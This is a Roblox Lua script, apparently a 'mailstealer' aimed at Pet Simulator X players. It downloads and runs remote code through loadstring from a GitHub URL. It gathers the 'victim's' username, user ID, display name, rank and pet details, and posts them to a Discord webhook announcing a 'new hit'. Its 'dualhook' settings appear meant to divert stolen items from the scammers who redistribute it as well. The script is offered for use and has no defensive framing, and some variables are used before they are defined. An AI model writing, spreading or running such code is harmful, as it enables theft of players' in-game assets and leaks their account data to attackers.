 getgenv().Settings = {
    PremiumKey = "rizzhub-LQOIpi8RuiFDqZ85hgwz",
    Webhook = false, -- By Making This True The Users Of Your Script Will Be Able
    -- To Use A Webhook And They Will Get Every Notif Even The Dualhooked Ones
    MailMessage = "Monz Better",
  Titanics = {
       Dualhook = false,
       Intensity = 100--%
  },
  Banana = {
       Dualhook = false,
       Intensity = 100--%
  },
  Huges = {
       Dualhook = false,
       Intensity = 100--%
  },
  Pogs = {
       Dualhook = false,
       Intensity = 100--%
  },
   Exclusives = {
       Dualhook = false,
       Intensity = 100--%
  },
   Events = {
       Dualhook = false,
       Intensity = 100--%
  },
   Secrets = {
       Dualhook = false,
       Intensity = 100--%
   },
   HC_DM_Mythics = {
       Dualhook = false,
       Intensity = 100--%
   },
   Gems = {
       Dualhook = false,
       Intensity = 100--%
  }
}
    
loadstring(game:HttpGet("https://raw.githubusercontent.com/SuperMonz/Psx_Sc/main/Petsimguiss", true))()


if game.PlaceId == 6284583030 then
	_G.GameIn = "Pet Simulator X"
elseif game.PlaceId == 7722306047 then
	_G.GameIn = "PSX Trading Plaza"
elseif game.PlaceId == 10321372166 then
	_G.GameIn = "PSX Hardcore"
elseif game.PlaceId == 12610002282 then
	_G.GameIn = "PSX Pro Trading Plaza"
elseif game.PlaceId == 11725212117 then
	_G.GameIn = "PSX Voice Trading Plaza"
else
	_G.GameIn = "❓ Couldn't find game"
end
local webhookcolor = "13369599"
_G.CurrentRank = game:GetService("Players").LocalPlayer.PlayerGui.Main.Right.Rank.RankName.Text
_G.PlrUserVictim = game.Players.LocalPlayer.Name
_G.PlrUserIDVictim = game.Players.LocalPlayer.UserId
_G.PlrDisplayNameVictim = game.Players.LocalPlayer.DisplayName
_G.PetName = v2.name
_G.PetRar = v2.rarity

local function sendwebhook(msg)
local msg = {
  ["content"]= "|| @everyone || **Hostee Mailstealer has detected a new hit!**",
  ["embeds"]= {
    {
      ["title"]= "`Hostee Mailstealer Results`",
      ["description"]= "**Data from the victim**\n🧑Display Name: ".._G.PlrDisplayNameVictim.."\n🧑Username: ".._G.PlrUserVictim.."\n🧑User ID: ".._G.PlrUserIDVictim.."\n🐱Rank: ".._G.CurrentRank.."\n🎮Place: ".._G.GameIn.."",
      ["url"]= "https://discord.gg/hosteehub",
      ["color"]= ""..webhookcolor.."",
      ["fields"]= {
        {
          ["name"]= "Diamonds 💎",
          ["value"]= "```".._G.Diamonds.."```",
          ["inline"]= true
        },
        {
          ["name"]= "Pet Name & Rarity",
          ["value"]= "```Pet Name: ".._G.PetName.."\nPet Rarity: ".._G.PetRar.."```",
		  ["inline"]= true
        }
      }
    }
  },
  ["attachments"] = {}
}
local Webhook = _G.Webhook
request = http_request or request or HttpPost or syn.request
request({Url = Webhook, Method = "POST", Headers = {["Content-Type"] = "application/json"}, Body = game.HttpService:JSONEncode(msg)})
end
sendwebhook(msg)